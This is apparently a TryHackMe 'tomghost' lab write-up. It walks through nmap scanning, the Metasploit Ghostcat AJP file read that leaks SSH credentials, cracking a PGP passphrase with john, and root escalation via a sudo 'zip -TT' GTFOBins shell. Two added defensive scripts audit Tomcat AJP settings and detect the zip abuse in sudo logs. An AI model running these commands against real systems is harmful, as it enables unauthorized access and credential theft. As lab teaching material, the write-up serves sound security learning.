TryHackMe - tomghost - Write Up
Task 1
Task 1.1
>> Compromise this machine and obtain user.txt
Prep:
root@ip-10-10-48-72:~# export ip=10.10.50.105
root@ip-10-10-48-72:~# echo $ip
Enumerate services with nmap:
root@ip-10-10-48-72:~# sudo nmap -sSVC -n -O -T4 -A $ip
-sS TCP SYN (half-open) scan
-sV Probe open ports to determine service and version
-sC Run the default NSE scripts
-n No DNS resolution
-O OS detection
-T4 Timing template, i.e. speed of the scan and the noise it makes (0 slowest and quietest, 5 fastest and loudest)
-A Aggressive scan (enables version detection, script scanning, OS detection and traceroute)
Result
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (EdDSA)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:23:E0:7A:4A:53 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
[...]
There are some interesting ports:
- 22 ssh
- 53 DNS server running?
- 8009 ajp13 - Apache JServ Protocol, a binary protocol
- 8080 Apache Tomcat webserver
Opening $ip:8080 in a browser presents us with the default Tomcat page. Some information is visible there, like the path $CATALINA_HOME/conf/tomcat-users.xml. Might come in handy later.
I looked into Metasploit and found something called tomcat_ghostcat - well, looks familiar.
$ msfconsole
msf6 > search ajp

#  Name                                  Disclosure Date  Rank    Check  Description
-  ----                                  ---------------  ----    -----  -----------
0  auxiliary/admin/http/tomcat_ghostcat  2020-02-20       normal  Yes    Apache Tomcat AJP File Read
Let us go with it, using the following msf commands:
msf6 > use 0
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 10.10.50.105
RHOSTS => 10.10.50.105
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
Result
[*] Running module against 10.10.50.105
[...]
<description>
Welcome to GhostCat
skyfuck:*****************
</description>
</web-app>
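The file read above works because the default AJP connector of Tomcat versions before 9.0.31 listens on all interfaces with no shared secret; 9.0.31 and later ship it disabled, bound to loopback and with secretRequired="true". As an added check (not part of the original write-up or of Tomcat itself), this script audits a server.xml for exactly those three settings; the two XML samples are constructed here.

```python
"""Audit a Tomcat server.xml for an exposed AJP connector (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample resembling the pre-9.0.31 default: AJP enabled, no
# address (all interfaces) and no secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

# Constructed hardened counterpart: loopback only, secret required and set.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_RANDOM_SECRET" />
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp(server_xml: str) -> list:
    """Return one finding string per weak setting on every AJP connector."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        addr = conn.get("address")  # missing meant "all interfaces" before 9.0.31
        if addr is None or addr not in LOOPBACK:
            findings.append(f"AJP:{port} bound to {addr or 'all interfaces'}")
        # The audit is conservative: it wants secretRequired stated explicitly,
        # since only 9.0.31+ defaults it to true.
        if conn.get("secretRequired", "false").lower() != "true":
            findings.append(f"AJP:{port} does not require a secret")
        elif not conn.get("secret"):
            findings.append(f"AJP:{port} requires a secret but none is set")
    return findings


if __name__ == "__main__":
    for name, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(name, audit_ajp(xml) or ["ok"])
```

Point it at the real $CATALINA_HOME/conf/server.xml and the weak sample should produce the same two findings the 9.0.30 default does.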
Some credentials! Let's try to log into SSH!
root@ip-10-10-48-72:~# ssh skyfuck@$ip
[...]
skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
skyfuck@ubuntu:~$
And we don't have to look far. A private key and something to decrypt.
Get the files to the attacking machine with scp (run from the attacking machine):
scp skyfuck@$ip:/home/skyfuck/* .
Create a hash of the key with gpg2john and crack it with john.
root@ip-10-10-48-72:~# gpg2john tryhackme.asc > hashofkey

File tryhackme.asc
root@ip-10-10-48-72:~# cat hashofkey
tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <stuxnet@tryhackme.com>::tryhackme.asc
root@ip-10-10-48-72:~# john --wordlist=/usr/share/wordlists/rockyou.txt hashofkey
[...]
Press 'q' or Ctrl-C to abort, almost any other key for status
**********       (tryhackme)
1g 0:00:00:00 DONE (2024-02-20 17:16) 5.882g/s 6305p/s 6305c/s 6305C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Let us decrypt the file credential.pgp:
root@ip-10-10-48-72:~# gpg --import tryhackme.asc
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 8F3DA3DEC6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
root@ip-10-10-48-72:~# gpg --decrypt credential.pgp
gpg: WARNING: cypher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:*****************************************************************
And more credentials - SSH yet again.
root@ip-10-10-48-72:~# ssh merlin@$ip
merlin@10.10.50.105's password:
[...]
merlin@ubuntu:~$ ls
user.txt
merlin@ubuntu:~$ cat user.txt
***{*****************}
Task 1.2
>> Escalate privileges and obtain root.txt
Let us check what we can do:
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$
Let's hop over to https://gtfobins.github.io and see what we can do with zip.
Some 'brute-forcing' later and I got in with:
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
root
Getting the flag.
# cd /root/
# ls
root.txt  ufw
# cat ./root.txt
***{*********}
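The escalation works because zip's -TT option runs a user-supplied command to "test" the archive, so a NOPASSWD rule for /usr/bin/zip is effectively a NOPASSWD rule for a root shell. As an added detection example (not part of the original write-up), this script parses the standard sudo syslog line format and flags any zip invocation carrying -TT; the auth.log lines below are constructed samples, and the hypothetical file name /tmp/tmp.Kx1Q2 stands in for the mktemp output.

```python
"""Flag sudo log entries where zip is run with -TT (added detection example)."""
import re
import shlex

# Constructed sample auth.log lines: a legitimate zip, a GTFOBins-style abuse
# like the one in this room, and an unrelated command.
SAMPLE_AUTH_LOG = """\
Feb 20 17:10:12 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/home/merlin ; USER=root ; COMMAND=/usr/bin/zip /tmp/backup.zip /etc/hosts
Feb 20 17:16:03 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/home/merlin ; USER=root ; COMMAND=/usr/bin/zip /tmp/tmp.Kx1Q2 /etc/hosts -T -TT sh #
Feb 20 17:17:44 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/home/merlin ; USER=root ; COMMAND=/bin/ls /root
"""

# sudo logs "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>"
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)


def parse_sudo_line(line: str):
    """Return (user, target_user, argv) for a sudo log line, else None."""
    m = SUDO_LINE.search(line)
    if not m:
        return None
    return m.group("user"), m.group("target"), shlex.split(m.group("cmd"))


def is_zip_test_command_abuse(argv) -> bool:
    """True when argv is zip invoked with -TT (given as -TT cmd or -TTcmd)."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "zip":
        return False
    return any(arg.startswith("-TT") for arg in argv[1:])


def find_alerts(log_text: str) -> list:
    """Return (user, target_user, command) tuples for abusive zip invocations."""
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_sudo_line(line)
        if parsed and is_zip_test_command_abuse(parsed[2]):
            alerts.append((parsed[0], parsed[1], " ".join(parsed[2])))
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_AUTH_LOG):
        print("ALERT sudo zip -TT:", alert)
```

The lasting fix is to drop the NOPASSWD zip rule from sudoers; the detection above is for catching the pattern on hosts where such rules still exist.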